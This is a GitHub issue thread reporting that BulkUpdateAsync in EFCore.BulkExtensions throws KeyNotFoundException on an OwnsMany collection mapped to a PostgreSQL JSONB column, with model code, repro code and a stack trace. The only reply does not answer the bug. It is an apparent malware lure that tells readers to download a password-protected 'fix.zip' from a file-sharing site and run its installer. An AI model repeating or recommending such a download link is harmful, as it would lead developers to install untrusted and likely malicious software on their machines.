### ISSUE TITLE
BulkUpdateAsync throws KeyNotFoundException on OwnsMany with JSONB column

### ISSUE THREAD

**Issue by AndriyKhavro** [borisdj/EFCore.BulkExtensions#1554]
Here are the repro steps: https://github.com/AndriyKhavro/BulkExtensionJsonb
I followed [this article](https://medium.com/@serhiikokhan/jsonb-in-postgresql-with-ef-core-cc945f1aba2a) to map a collection property of an entity to JSONB type. Calling `BulkUpdateAsync` on this type throws KeyNotFoundException.

Here is the db context:
```
public class Product
{
    public int Id { get; set; }
    public string Name { get; set; } = string.Empty;
    public List<Review> Reviews { get; set; } = [];
    public DateTimeOffset CreatedAt { get; set; } = DateTimeOffset.UtcNow;
    public DateTimeOffset UpdatedAt { get; set; } = DateTimeOffset.UtcNow;
}

public class Review
{
    public string User { get; set; }
    public string Content { get; set; }
    public int Rating { get; set; }
}


public class ProductContext : DbContext
{
    public DbSet<Product> Products => Set<Product>();

    protected override void OnConfiguring(DbContextOptionsBuilder optionsBuilder)
        => optionsBuilder
            .UseNpgsql("Server=localhost;Port=5432;Database=BulkExtensionJsonb;Username=postgres;Password=somepassword;");

    protected override void OnModelCreating(ModelBuilder modelBuilder)
    {
        modelBuilder
            .Entity<Product>()
            .OwnsMany(product => product.Reviews, builder => { builder.ToJson(); });
    }
}
```

And the code that throws the exception:
```
﻿using BulkExtensionJsonb;
using EFCore.BulkExtensions;

int id = Random.Shared.Next();

var context = new ProductContext();
await context.Products.AddAsync(new Product { Id = id });
await context.SaveChangesAsync();

var product = await context.Products.FindAsync(id);

product!.UpdatedAt = DateTimeOffset.UtcNow;
await context.BulkUpdateAsync(new[] { product }); // throws System.Collections.Generic.KeyNotFoundException
```

Call stack:
```
Unhandled exception. System.Collections.Generic.KeyNotFoundException: The given key 'Reviews' was not present in the dictionary.
   at System.Collections.Generic.Dictionary`2.get_Item(TKey key)
   at EFCore.BulkExtensions.SqlAdapters.PostgreSql.PostgreSqlAdapter.InsertAsync[T](DbContext context, IEnumerable`1 entities, TableInfo tableInfo, Action`1 progress, Boolean isAsync, CancellationToken cancellationToken)
   at EFCore.BulkExtensions.SqlAdapters.PostgreSql.PostgreSqlAdapter.InsertAsync[T](DbContext context, IEnumerable`1 entities, TableInfo tableInfo, Action`1 progress, Boolean isAsync, CancellationToken cancellationToken)
   at EFCore.BulkExtensions.SqlAdapters.PostgreSql.PostgreSqlAdapter.InsertAsync[T](DbContext context, Type type, IEnumerable`1 entities, TableInfo tableInfo, Action`1 progress, CancellationToken cancellationToken)
   at EFCore.BulkExtensions.SqlAdapters.PostgreSql.PostgreSqlAdapter.MergeAsync[T](DbContext context, Type type, IEnumerable`1 entities, TableInfo tableInfo, OperationType operationType, Action`1 progress, Boolean isAsync, CancellationToken cancellationToken)
   at EFCore.BulkExtensions.SqlAdapters.PostgreSql.PostgreSqlAdapter.MergeAsync[T](DbContext context, Type type, IEnumerable`1 entities, TableInfo tableInfo, OperationType operationType, Action`1 progress, Boolean isAsync, CancellationToken cancellationToken)
   at EFCore.BulkExtensions.SqlAdapters.PostgreSql.PostgreSqlAdapter.MergeAsync[T](DbContext context, Type type, IEnumerable`1 entities, TableInfo tableInfo, OperationType operationType, Action`1 progress, CancellationToken cancellationToken)
   at EFCore.BulkExtensions.SqlBulkOperation.MergeAsync[T](DbContext context, Type type, IEnumerable`1 entities, TableInfo tableInfo, OperationType operationType, Action`1 progress, CancellationToken cancellationToken)
   at EFCore.BulkExtensions.DbContextBulkTransaction.ExecuteAsync[T](DbContext context, Type type, IEnumerable`1 entities, OperationType operationType, BulkConfig bulkConfig, Action`1 progress, CancellationToken cancellationToken)
   at Program.<Main>$(String[] args) in C:\code\BulkExtensionJsonb\Program.cs:line 14
   at Program.<Main>(String[] args)
```

Am I doing something wrong or is it a bug?

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
